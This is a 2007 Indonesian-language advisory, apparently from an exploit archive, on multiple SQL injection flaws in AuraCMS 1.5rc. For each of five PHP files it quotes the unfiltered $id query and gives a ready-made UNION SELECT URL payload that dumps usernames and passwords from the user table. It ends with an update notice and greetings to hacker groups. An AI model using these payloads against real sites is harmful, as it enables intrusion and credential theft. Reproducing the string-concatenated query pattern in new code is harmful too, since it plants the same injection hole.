Home / os / linux

auracms15-sql.txt

Posted on 10 September 2007

######################################################################## # AuraCMS version 1.5rc - Multiple Remote SQL Injection Vulnerabilities # Vendor : http://www.auracms.org/ # Ditemukan oleh : k1tk4t - k1tk4t[4t]newhack.org # Lokasi : Indonesia -- #newhack[dot]org @ irc.dal.net ######################################################################## // Kutu pada berkas 'hal.php' baris-7 $perintah="SELECT * FROM halaman WHERE id=$id"; $hasil = mysql_query( $perintah ); --> $id tidak ter'filter'sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser Contoh; http://localhost/auracms15/?pilih=hal&id=-9%20UNION%20SELECT%200,user,password%20from%20user/* // Kutu pada berkas 'cetak.php' baris-7 $perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1"; $hasil = mysql_query( $perintah ); --> $id tidak ter'filter'sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser Contoh; http://localhost/auracms15/cetak.php?id=-9%20UNION%20SELECT%20null,null,null,password,null,user,null,null%20from%20user/* // Kutu pada berkas 'lihat.php' baris-7 $perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1"; $hasil = mysql_query( $perintah ); --> $id tidak ter'filter' sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser Contoh; http://localhost/AuraCMS1.5/?pilih=lihat&id=-9%20UNION%20SELECT%20null,user,password,null,null,null,null,null%20from%20user/* // Kutu pada berkas 'pesan.php' baris-7 $perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1"; } else { $perintah="SELECT * FROM komentar WHERE id=$id"; --> $id tidak ter'filter' sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser Contoh; http://localhost/AuraCMS1.5/?pilih=pesan&id=-9%20UNION%20SELECT%20null,null,null,concat(user,0x3a,password),null,null,null,null%20from%20user/* // Kutu pada berkas 'teman.php' baris-6 $perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1"; $hasil = mysql_query( $perintah ); --> $id tidak ter'filter' sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser Contoh; http://localhost/AuraCMS1.5/?pilih=teman&id=-9%20UNION%20SELECT%20null,concat(user,0x3a,password),null,null,null,null,null,null%20from%20user/* ######################################################################## !!! Mohon maaf untuk webadmin mohon di update ke AuraCMS versi terbaru !!! ######################################################################## Terimakasih untuk; str0ke, DNX xoron,iFX,x-ace,nyubi,arioo,selikoer,k1ngk0ng,aldy_BT,adhietslank dan semua temen2 komunitas security&hacking ----------------------- -newhack[dot]org|staff- mR.opt1lc ,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX ----------------------- all member newhack[dot]org ----------------------- all member www.echo.or.id ----------------------- all member www.yogyafree.net ----------------------- all member www.sekuritionline.net ----------------------- all member www.kecoak-elektronik.net ----------------------- semua komunitas hacker&security Indonesia Cintailah Bahasa Indonesia

 

TOP